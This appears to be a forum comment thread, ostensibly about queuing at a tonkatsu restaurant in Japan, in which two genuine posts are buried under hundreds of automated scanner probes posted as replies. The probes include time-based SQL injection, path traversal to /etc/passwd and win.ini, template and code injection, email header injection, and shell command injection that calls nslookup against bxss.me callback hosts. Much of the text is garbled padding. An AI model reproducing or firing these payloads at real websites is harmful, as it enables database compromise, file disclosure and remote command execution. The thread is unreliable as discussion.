.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Leo Saito
WEB-INF/web.xml
re: Leo Saito
WEB-INF\web.xml
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
-1 OR 2+850-850-1=0+0+0+1 --
re: Leo Saito
-1 OR 3+850-850-1=0+0+0+1 --
re: Leo Saito
-1 OR 2+475-475-1=0+0+0+1
re: Leo Saito
-1 OR 3+475-475-1=0+0+0+1
re: Leo Saito
-1' OR 2+277-277-1=0+0+0+1 --
re: Leo Saito
-1' OR 3+277-277-1=0+0+0+1 --
re: Leo Saito
-1' OR 2+92-92-1=0+0+0+1 or 'BFjCOaSi'='
re: Leo Saito
-1' OR 3+92-92-1=0+0+0+1 or 'BFjCOaSi'='
re: Leo Saito
-1" OR 2+502-502-1=0+0+0+1 --
re: Leo Saito
-1" OR 3+502-502-1=0+0+0+1 --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
A5q1EJLp'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 166=(SELECT 166 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 673=(SELECT 673 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 403=(SELECT 403 FROM PG_SLEEP(15))--
re: Leo Saito
UGirANxx' OR 530=(SELECT 530 FROM PG_SLEEP(15))--
re: Leo Saito
0WsKJgkw') OR 189=(SELECT 189 FROM PG_SLEEP(15))--
re: Leo Saito
oXGow8OC')) OR 76=(SELECT 76 FROM PG_SLEEP(15))--
re: Leo Saito
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@2nSj5
For tonkatsu bamboo, anyone know the best time to queue for it? Am getting mixed info from tabelog, some say 30 mins before opening, some say 15 mins.
re: guest
lEQCQ9SA
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+753-753-1=0+0+0+1
re: guest
-1 OR 3+753-753-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
8Hv8104Z'; waitfor delay '0:0:15' --
re: guest
-5 OR 699=(SELECT 699 FROM PG_SLEEP(15))--
re: guest
-5) OR 434=(SELECT 434 FROM PG_SLEEP(15))--
re: guest
-1)) OR 674=(SELECT 674 FROM PG_SLEEP(15))--
re: guest
A8XJezb3' OR 252=(SELECT 252 FROM PG_SLEEP(15))--
re: guest
1441c9bg') OR 911=(SELECT 911 FROM PG_SLEEP(15))--
re: guest
SpAMI81A')) OR 116=(SELECT 116 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@avE3x
re: guest
YK0RQgJa
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+219-219-1=0+0+0+1
re: guest
-1 OR 3+219-219-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
LfJPbrxz'; waitfor delay '0:0:15' --
re: guest
-5 OR 309=(SELECT 309 FROM PG_SLEEP(15))--
re: guest
-5) OR 151=(SELECT 151 FROM PG_SLEEP(15))--
re: guest
-1)) OR 488=(SELECT 488 FROM PG_SLEEP(15))--
re: guest
edz7STfk' OR 166=(SELECT 166 FROM PG_SLEEP(15))--
re: guest
1G0POefW') OR 763=(SELECT 763 FROM PG_SLEEP(15))--
re: guest
fq4ggimf')) OR 938=(SELECT 938 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@wBnCY
re: guest
1dRs5kbnO
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
%0abcc:074625.67-10054.67.95342.19990.2@bxss.me
re: guest
${10000033+9999935}
re: guest
response.write(9260406*9768931)
re: guest
to@example.com>%0d%0abcc:074625.67-10055.67.95342.19990.2@bxss.me
re: guest
'+response.write(9260406*9768931)+'
re: guest
"+response.write(9260406*9768931)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
'.gethostbyname(lc('hitvj'.'fhingfvu7688b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(80).chr(109).chr(77).'
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
".gethostbyname(lc("hitas"."fhjobtqw9f254.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(68).chr(106).chr(89)."
re: guest
)
re: guest
file:///etc/passwd
re: guest
!(()&&!|*|*|
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
^(#$!@#$)(()))******
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(106).concat(79).concat(101).concat(75)+(require"socket"
Socket.gethostbyname("hitrs"+"vmdeurxnb9e22.bxss.me.")[3].to_s)+"
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(122).concat(87).concat(107).concat(76)+(require'socket'
Socket.gethostbyname('hityq'+'mkppzvrc53c02.bxss.me.')[3].to_s)+'
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
/etc/passwd
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
echo rymvts$()\ dwnvtn\nz^xyu||a #' &echo rymvts$()\ dwnvtn\nz^xyu||a #|" &echo rymvts$()\ dwnvtn\nz^xyu||a #
re: guest
'"
re: guest
%2fetc%2fpasswd
re: guest
Http://bxss.me/t/fit.txt
re: guest
&echo hrdhzs$()\ rhvniz\nz^xyu||a #' &echo hrdhzs$()\ rhvniz\nz^xyu||a #|" &echo hrdhzs$()\ rhvniz\nz^xyu||a #
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
<!--
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
|echo wpeoom$()\ eawngq\nz^xyu||a #' |echo wpeoom$()\ eawngq\nz^xyu||a #|" |echo wpeoom$()\ eawngq\nz^xyu||a #
re: guest
';print(md5(31337));$a='
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
/etc/shells
re: guest
(nslookup hitkvuuoultrr341e2.bxss.me||perl -e "gethostbyname('hitkvuuoultrr341e2.bxss.me')")
re: guest
";print(md5(31337));$a="
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
c:/windows/win.ini
re: guest
$(nslookup hitwzyzzytlhp55ca4.bxss.me||perl -e "gethostbyname('hitwzyzzytlhp55ca4.bxss.me')")
re: guest
${@print(md5(31337))}
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
bxss.me
re: guest
&nslookup hitrmejwbqevmd6fc9.bxss.me&'\"`0&nslookup hitrmejwbqevmd6fc9.bxss.me&`'
re: guest
${@print(md5(31337))}\
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
&(nslookup hitjdvemlvvfb550cb.bxss.me||perl -e "gethostbyname('hitjdvemlvvfb550cb.bxss.me')")&'\"`0&(nslookup hitjdvemlvvfb550cb.bxss.me||perl -e "gethostbyname('hitjdvemlvvfb550cb.bxss.me')")&`'
re: guest
'.print(md5(31337)).'
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
|(nslookup hitpzgikxapvk814b3.bxss.me||perl -e "gethostbyname('hitpzgikxapvk814b3.bxss.me')")
re: guest
file:///etc/passwd
re: guest
`(nslookup hitkckwjiityf275d9.bxss.me||perl -e "gethostbyname('hitkckwjiityf275d9.bxss.me')")`
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
;(nslookup hitmuskbzkvvrc4635.bxss.me||perl -e "gethostbyname('hitmuskbzkvvrc4635.bxss.me')")|(nslookup hitmuskbzkvvrc4635.bxss.me||perl -e "gethostbyname('hitmuskbzkvvrc4635.bxss.me')")&(nslookup hitmuskbzkvvrc4635.bxss.me||perl -e "gethostbyname('hitmuskbzkvvrc4635.bxss.me')")
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+616-616-1=0+0+0+1 --
re: guest
-1 OR 3+616-616-1=0+0+0+1 --
re: guest
-1 OR 2+842-842-1=0+0+0+1
re: guest
-1 OR 3+842-842-1=0+0+0+1
re: guest
-1' OR 2+997-997-1=0+0+0+1 --
re: guest
-1' OR 3+997-997-1=0+0+0+1 --
re: guest
-1' OR 2+846-846-1=0+0+0+1 or 'AjNKrJZg'='
re: guest
-1' OR 3+846-846-1=0+0+0+1 or 'AjNKrJZg'='
re: guest
-1" OR 2+364-364-1=0+0+0+1 --
re: guest
-1" OR 3+364-364-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
8go40xmi'; waitfor delay '0:0:15' --
re: guest
-5 OR 498=(SELECT 498 FROM PG_SLEEP(15))--
re: guest
-5) OR 842=(SELECT 842 FROM PG_SLEEP(15))--
re: guest
-1)) OR 915=(SELECT 915 FROM PG_SLEEP(15))--
re: guest
4TrvJBip' OR 705=(SELECT 705 FROM PG_SLEEP(15))--
re: guest
UIvbNLiO') OR 726=(SELECT 726 FROM PG_SLEEP(15))--
re: guest
W6FIz5K6')) OR 274=(SELECT 274 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@6dvK6
For your reference, when I went for dinner, there was no queue at all.
Unsure about lunch though, but I've heard 15 mins should be sufficient
re: Eric Yu
yGDKsaFq
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+973-973-1=0+0+0+1
re: Eric Yu
-1 OR 3+973-973-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
tCRfb4Do'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 267=(SELECT 267 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 925=(SELECT 925 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 293=(SELECT 293 FROM PG_SLEEP(15))--
re: Eric Yu
Isz1577q' OR 983=(SELECT 983 FROM PG_SLEEP(15))--
re: Eric Yu
CYnokVfh') OR 571=(SELECT 571 FROM PG_SLEEP(15))--
re: Eric Yu
JUo0JjOV')) OR 562=(SELECT 562 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
